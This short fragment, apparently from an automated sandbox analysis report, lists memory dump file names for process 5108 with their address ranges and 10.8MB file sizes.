  • memory/5108-218-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/5108-213-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/5108-210-0x0000000000000000-mapping.dmp